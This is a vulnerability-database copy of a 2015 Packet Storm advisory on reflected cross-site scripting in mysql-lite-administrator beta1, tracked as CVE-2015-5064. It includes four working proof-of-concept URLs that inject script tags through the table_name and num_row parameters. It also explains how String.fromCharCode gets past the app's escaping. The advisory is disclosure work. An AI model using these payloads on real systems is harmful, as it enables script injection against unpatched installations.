Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHyp3rlinxPACKETSTORM:132420
HistoryJun 22, 2015 - 12:00 a.m.

MySQL Lite Administrator Beta 1 Cross Site Scripting

2015-06-2200:00:00
hyp3rlinx
packetstormsecurity.com
19

0.002 Low

EPSS

Percentile

59.6%

JSON
`[+] Credits: hyp3rlinx  
  
[+] Domains: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt  
  
  
Vendor:  
=============================================  
code.google.com/p/mysql-lite-administrator  
  
  
Product:  
==================================================  
mysql-lite-administrator(beta1)  
  
  
Advisory Information:  
==============================  
Multiple XSS vulnerabilities  
  
  
  
Vulnerability Details:  
======================  
mysql-lite-administrator is vulnerable to XSS attacks, the application  
escapes  
injected strings.  
e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript  
functions  
String.charCodeAt() & String.fromCharCode()  
  
  
XSS Exploit code(s):  
====================  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/tabella.php?table_name=  
<script>alert(String.fromCharCode(72,69,76,76))</script>  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=  
<script>alert(666)</script>  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/coloni.php?num_row=  
"><script>alert(String.fromCharCode(72,69,76,76))</script>  
  
http://localhost/mysql-lite-administrator(beta1)/mysql-lite-administrator(beta1)/insert.php?table_name=  
<script>alert(666)</script>  
  
  
Disclosure Timeline:  
=========================================================  
Vendor Notification: NA  
June 21, 2015 : Public Disclosure  
  
  
  
Severity Level:  
=========================================================  
Med  
  
  
  
Description:  
==========================================================  
  
Request Method(s): [+] GET  
  
  
Vulnerable Product: [+] mysql-lite-administrator (beta1)  
  
  
Vulnerable Parameter(s): [+] table_name, num_row  
  
  
Affected Area(s): [+] tabella.php & coloni.php  
  
  
===============================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that  
it is not altered except by reformatting it, and that due credit is given.  
Permission is  
explicitly given for insertion in vulnerability databases and similar,  
provided that  
due credit is given to the author. The author is not responsible for any  
misuse of the  
information contained herein and prohibits any malicious use of all  
security related  
information or exploits by the author or elsewhere.  
  
  
(hyp3rlinx)  
`

Related

cve 1
prion 1
nvd 1
cvelist 1
cve
cve
CVE-2015-5064
2015-06-24 14:59:06
prion
prion
Cross site scripting
2015-06-24 14:59:00
nvd
nvd
CVE-2015-5064
2015-06-24 14:59:06
cvelist
cvelist
CVE-2015-5064
2015-06-24 14:00:00

0.002 Low

EPSS

Percentile

59.6%

JSON
Related for PACKETSTORM:132420
cve1prion1nvd1cvelist1